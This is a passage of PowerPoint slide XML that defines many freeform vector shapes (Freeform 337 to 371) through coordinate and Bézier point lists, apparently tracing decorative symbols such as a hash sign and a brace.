                      <a:pt x="71" y="46"/>
                      <a:pt x="73" y="45"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="97" y="40"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="99" y="41"/>
                      <a:pt x="99" y="42"/>
                      <a:pt x="100" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="44"/>
                      <a:pt x="101" y="43"/>
                      <a:pt x="101" y="43"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="42"/>
                      <a:pt x="100" y="41"/>
                      <a:pt x="99" y="40"/>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Freeform 337"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4080" y="1518"/>
                <a:ext cx="3" cy="4"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 2 w 2"/>
                  <a:gd name="T1" fmla="*/ 0 h 3"/>
                  <a:gd name="T2" fmla="*/ 1 w 2"/>
                  <a:gd name="T3" fmla="*/ 2 h 3"/>
                  <a:gd name="T4" fmla="*/ 0 w 2"/>
                  <a:gd name="T5" fmla="*/ 3 h 3"/>
                  <a:gd name="T6" fmla="*/ 0 w 2"/>
                  <a:gd name="T7" fmla="*/ 1 h 3"/>
                  <a:gd name="T8" fmla="*/ 2 w 2"/>
                  <a:gd name="T9" fmla="*/ 0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1"/>
                      <a:pt x="1" y="2"/>
                      <a:pt x="1" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="2"/>
                      <a:pt x="0" y="2"/>
                      <a:pt x="0" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="2"/>
                      <a:pt x="0" y="1"/>
                      <a:pt x="0" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0"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Freeform 338"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4093" y="1518"/>
                <a:ext cx="3" cy="3"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 3"/>
                  <a:gd name="T1" fmla="*/ 0 h 2"/>
                  <a:gd name="T2" fmla="*/ 3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Freeform 339"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2044"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Freeform 340"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2193"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Freeform 341"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2388"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Freeform 342"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2813"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Freeform 343"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2960"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Freeform 344"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3159"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Freeform 345"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3308"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Freeform 346"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3456" y="1833"/>
                <a:ext cx="155"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Freeform 347"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3654"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Freeform 348"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="380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Freeform 349"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3996"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Freeform 350"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="419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Freeform 351"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4389"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Freeform 352"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="453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2"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Freeform 353"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4723" y="1838"/>
                <a:ext cx="187" cy="219"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 187 w 187"/>
                  <a:gd name="T1" fmla="*/ 67 h 219"/>
                  <a:gd name="T2" fmla="*/ 184 w 187"/>
                  <a:gd name="T3" fmla="*/ 84 h 219"/>
                  <a:gd name="T4" fmla="*/ 141 w 187"/>
                  <a:gd name="T5" fmla="*/ 84 h 219"/>
                  <a:gd name="T6" fmla="*/ 130 w 187"/>
                  <a:gd name="T7" fmla="*/ 135 h 219"/>
                  <a:gd name="T8" fmla="*/ 176 w 187"/>
                  <a:gd name="T9" fmla="*/ 135 h 219"/>
                  <a:gd name="T10" fmla="*/ 173 w 187"/>
                  <a:gd name="T11" fmla="*/ 153 h 219"/>
                  <a:gd name="T12" fmla="*/ 126 w 187"/>
                  <a:gd name="T13" fmla="*/ 153 h 219"/>
                  <a:gd name="T14" fmla="*/ 112 w 187"/>
                  <a:gd name="T15" fmla="*/ 219 h 219"/>
                  <a:gd name="T16" fmla="*/ 91 w 187"/>
                  <a:gd name="T17" fmla="*/ 219 h 219"/>
                  <a:gd name="T18" fmla="*/ 106 w 187"/>
                  <a:gd name="T19" fmla="*/ 153 h 219"/>
                  <a:gd name="T20" fmla="*/ 64 w 187"/>
                  <a:gd name="T21" fmla="*/ 153 h 219"/>
                  <a:gd name="T22" fmla="*/ 50 w 187"/>
                  <a:gd name="T23" fmla="*/ 219 h 219"/>
                  <a:gd name="T24" fmla="*/ 29 w 187"/>
                  <a:gd name="T25" fmla="*/ 219 h 219"/>
                  <a:gd name="T26" fmla="*/ 42 w 187"/>
                  <a:gd name="T27" fmla="*/ 153 h 219"/>
                  <a:gd name="T28" fmla="*/ 0 w 187"/>
                  <a:gd name="T29" fmla="*/ 153 h 219"/>
                  <a:gd name="T30" fmla="*/ 2 w 187"/>
                  <a:gd name="T31" fmla="*/ 135 h 219"/>
                  <a:gd name="T32" fmla="*/ 47 w 187"/>
                  <a:gd name="T33" fmla="*/ 135 h 219"/>
                  <a:gd name="T34" fmla="*/ 57 w 187"/>
                  <a:gd name="T35" fmla="*/ 84 h 219"/>
                  <a:gd name="T36" fmla="*/ 11 w 187"/>
                  <a:gd name="T37" fmla="*/ 84 h 219"/>
                  <a:gd name="T38" fmla="*/ 14 w 187"/>
                  <a:gd name="T39" fmla="*/ 67 h 219"/>
                  <a:gd name="T40" fmla="*/ 61 w 187"/>
                  <a:gd name="T41" fmla="*/ 67 h 219"/>
                  <a:gd name="T42" fmla="*/ 74 w 187"/>
                  <a:gd name="T43" fmla="*/ 0 h 219"/>
                  <a:gd name="T44" fmla="*/ 95 w 187"/>
                  <a:gd name="T45" fmla="*/ 0 h 219"/>
                  <a:gd name="T46" fmla="*/ 81 w 187"/>
                  <a:gd name="T47" fmla="*/ 67 h 219"/>
                  <a:gd name="T48" fmla="*/ 123 w 187"/>
                  <a:gd name="T49" fmla="*/ 67 h 219"/>
                  <a:gd name="T50" fmla="*/ 137 w 187"/>
                  <a:gd name="T51" fmla="*/ 0 h 219"/>
                  <a:gd name="T52" fmla="*/ 158 w 187"/>
                  <a:gd name="T53" fmla="*/ 0 h 219"/>
                  <a:gd name="T54" fmla="*/ 145 w 187"/>
                  <a:gd name="T55" fmla="*/ 67 h 219"/>
                  <a:gd name="T56" fmla="*/ 187 w 187"/>
                  <a:gd name="T57" fmla="*/ 67 h 219"/>
                  <a:gd name="T58" fmla="*/ 120 w 187"/>
                  <a:gd name="T59" fmla="*/ 84 h 219"/>
                  <a:gd name="T60" fmla="*/ 78 w 187"/>
                  <a:gd name="T61" fmla="*/ 84 h 219"/>
                  <a:gd name="T62" fmla="*/ 67 w 187"/>
                  <a:gd name="T63" fmla="*/ 135 h 219"/>
                  <a:gd name="T64" fmla="*/ 109 w 187"/>
                  <a:gd name="T65" fmla="*/ 135 h 219"/>
                  <a:gd name="T66" fmla="*/ 120 w 187"/>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19">
                    <a:moveTo>
                      <a:pt x="187" y="67"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="184" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="187" y="67"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="120" y="84"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="78" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12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Freeform 354"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4940"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Freeform 355"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5137"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Freeform 356"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5286" y="1833"/>
                <a:ext cx="154"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Freeform 357"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5483"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Freeform 358"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="563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Freeform 359"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5828"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Freeform 360"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="597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Freeform 361"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6172"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Freeform 362"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6356" y="1838"/>
                <a:ext cx="189" cy="219"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 189 w 189"/>
                  <a:gd name="T1" fmla="*/ 67 h 219"/>
                  <a:gd name="T2" fmla="*/ 185 w 189"/>
                  <a:gd name="T3" fmla="*/ 84 h 219"/>
                  <a:gd name="T4" fmla="*/ 142 w 189"/>
                  <a:gd name="T5" fmla="*/ 84 h 219"/>
                  <a:gd name="T6" fmla="*/ 131 w 189"/>
                  <a:gd name="T7" fmla="*/ 135 h 219"/>
                  <a:gd name="T8" fmla="*/ 178 w 189"/>
                  <a:gd name="T9" fmla="*/ 135 h 219"/>
                  <a:gd name="T10" fmla="*/ 174 w 189"/>
                  <a:gd name="T11" fmla="*/ 153 h 219"/>
                  <a:gd name="T12" fmla="*/ 128 w 189"/>
                  <a:gd name="T13" fmla="*/ 153 h 219"/>
                  <a:gd name="T14" fmla="*/ 113 w 189"/>
                  <a:gd name="T15" fmla="*/ 219 h 219"/>
                  <a:gd name="T16" fmla="*/ 92 w 189"/>
                  <a:gd name="T17" fmla="*/ 219 h 219"/>
                  <a:gd name="T18" fmla="*/ 107 w 189"/>
                  <a:gd name="T19" fmla="*/ 153 h 219"/>
                  <a:gd name="T20" fmla="*/ 64 w 189"/>
                  <a:gd name="T21" fmla="*/ 153 h 219"/>
                  <a:gd name="T22" fmla="*/ 51 w 189"/>
                  <a:gd name="T23" fmla="*/ 219 h 219"/>
                  <a:gd name="T24" fmla="*/ 30 w 189"/>
                  <a:gd name="T25" fmla="*/ 219 h 219"/>
                  <a:gd name="T26" fmla="*/ 44 w 189"/>
                  <a:gd name="T27" fmla="*/ 153 h 219"/>
                  <a:gd name="T28" fmla="*/ 0 w 189"/>
                  <a:gd name="T29" fmla="*/ 153 h 219"/>
                  <a:gd name="T30" fmla="*/ 3 w 189"/>
                  <a:gd name="T31" fmla="*/ 135 h 219"/>
                  <a:gd name="T32" fmla="*/ 47 w 189"/>
                  <a:gd name="T33" fmla="*/ 135 h 219"/>
                  <a:gd name="T34" fmla="*/ 58 w 189"/>
                  <a:gd name="T35" fmla="*/ 84 h 219"/>
                  <a:gd name="T36" fmla="*/ 12 w 189"/>
                  <a:gd name="T37" fmla="*/ 84 h 219"/>
                  <a:gd name="T38" fmla="*/ 15 w 189"/>
                  <a:gd name="T39" fmla="*/ 67 h 219"/>
                  <a:gd name="T40" fmla="*/ 62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59 w 189"/>
                  <a:gd name="T53" fmla="*/ 0 h 219"/>
                  <a:gd name="T54" fmla="*/ 145 w 189"/>
                  <a:gd name="T55" fmla="*/ 67 h 219"/>
                  <a:gd name="T56" fmla="*/ 189 w 189"/>
                  <a:gd name="T57" fmla="*/ 67 h 219"/>
                  <a:gd name="T58" fmla="*/ 122 w 189"/>
                  <a:gd name="T59" fmla="*/ 84 h 219"/>
                  <a:gd name="T60" fmla="*/ 79 w 189"/>
                  <a:gd name="T61" fmla="*/ 84 h 219"/>
                  <a:gd name="T62" fmla="*/ 68 w 189"/>
                  <a:gd name="T63" fmla="*/ 135 h 219"/>
                  <a:gd name="T64" fmla="*/ 111 w 189"/>
                  <a:gd name="T65" fmla="*/ 135 h 219"/>
                  <a:gd name="T66" fmla="*/ 122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4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="67"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="122" y="84"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="79" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12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Freeform 363"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6574"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Freeform 364"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6769"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Freeform 365"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6966"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Freeform 366"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7114"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Freeform 367"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7312"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Freeform 368"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7454" y="1838"/>
                <a:ext cx="76"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7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7"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369"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7562" y="1838"/>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5 h 240"/>
                  <a:gd name="T14" fmla="*/ 21 w 63"/>
                  <a:gd name="T15" fmla="*/ 155 h 240"/>
                  <a:gd name="T16" fmla="*/ 42 w 63"/>
                  <a:gd name="T17" fmla="*/ 120 h 240"/>
                  <a:gd name="T18" fmla="*/ 42 w 63"/>
                  <a:gd name="T19" fmla="*/ 120 h 240"/>
                  <a:gd name="T20" fmla="*/ 21 w 63"/>
                  <a:gd name="T21" fmla="*/ 84 h 240"/>
                  <a:gd name="T22" fmla="*/ 21 w 63"/>
                  <a:gd name="T23" fmla="*/ 44 h 240"/>
                  <a:gd name="T24" fmla="*/ 0 w 63"/>
                  <a:gd name="T25" fmla="*/ 17 h 240"/>
                  <a:gd name="T26" fmla="*/ 0 w 63"/>
                  <a:gd name="T27" fmla="*/ 0 h 240"/>
                  <a:gd name="T28" fmla="*/ 41 w 63"/>
                  <a:gd name="T29" fmla="*/ 43 h 240"/>
                  <a:gd name="T30" fmla="*/ 41 w 63"/>
                  <a:gd name="T31" fmla="*/ 83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8" y="129"/>
                      <a:pt x="41" y="138"/>
                      <a:pt x="41" y="157"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="198"/>
                      <a:pt x="41" y="198"/>
                      <a:pt x="41" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="226"/>
                      <a:pt x="27" y="240"/>
                      <a:pt x="0" y="240"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="223"/>
                      <a:pt x="0" y="223"/>
                      <a:pt x="0" y="223"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="223"/>
                      <a:pt x="13" y="221"/>
                      <a:pt x="16" y="216"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="20" y="212"/>
                      <a:pt x="21" y="205"/>
                      <a:pt x="21" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="155"/>
                      <a:pt x="21" y="155"/>
                      <a:pt x="21" y="155"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="136"/>
                      <a:pt x="28" y="124"/>
                      <a:pt x="42" y="120"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="120"/>
                      <a:pt x="42" y="120"/>
                      <a:pt x="42" y="120"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="28" y="115"/>
                      <a:pt x="21" y="103"/>
                      <a:pt x="21" y="84"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="44"/>
                      <a:pt x="21" y="44"/>
                      <a:pt x="21" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="27"/>
                      <a:pt x="14" y="18"/>
                      <a:pt x="0" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="0"/>
                      <a:pt x="0" y="0"/>
                      <a:pt x="0" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="27" y="0"/>
                      <a:pt x="41" y="14"/>
                      <a:pt x="41" y="43"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="83"/>
                      <a:pt x="41" y="83"/>
                      <a:pt x="41" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="101"/>
                      <a:pt x="48"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Freeform 370"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7669"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Freeform 371"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2581" y="182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4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5"/>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9"/>
                      <a:pt x="72" y="199"/>
                      <a:pt x="68" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="203"/>
                      <a:pt x="64" y="204"/>
                      <a:pt x="63" y="205"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="208"/>
                      <a:pt x="54" y="209"/>
                      <a:pt x="48" y="207"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="43" y="206"/>
                      <a:pt x="38" y="204"/>
                      <a:pt x="32" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="200"/>
                      <a:pt x="18" y="199"/>
                      <a:pt x="11" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="197"/>
                      <a:pt x="7" y="196"/>
                      <a:pt x="5" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="194"/>
                      <a:pt x="0" y="191"/>
                      <a:pt x="1" y="188"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="187"/>
                      <a:pt x="2" y="185"/>
                      <a:pt x="2" y="184"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="180"/>
                      <a:pt x="5" y="176"/>
                      <a:pt x="3" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="170"/>
                      <a:pt x="2" y="168"/>
                      <a:pt x="2" y="167"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="163"/>
                      <a:pt x="3" y="160"/>
                      <a:pt x="7" y="160"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="160"/>
                      <a:pt x="12" y="160"/>
                      <a:pt x="14" y="159"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="158"/>
                      <a:pt x="22" y="155"/>
                      <a:pt x="23" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="150"/>
                      <a:pt x="23" y="150"/>
                      <a:pt x="23" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="153"/>
                      <a:pt x="23" y="160"/>
                      <a:pt x="17" y="162"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="162"/>
                      <a:pt x="12" y="163"/>
                      <a:pt x="9" y="162"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="162"/>
                      <a:pt x="9" y="162"/>
                      <a:pt x="9" y="162"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="162"/>
                      <a:pt x="3" y="164"/>
                      <a:pt x="4" y="168"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="169"/>
                      <a:pt x="6" y="171"/>
                      <a:pt x="6" y="173"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="176"/>
                      <a:pt x="8" y="180"/>
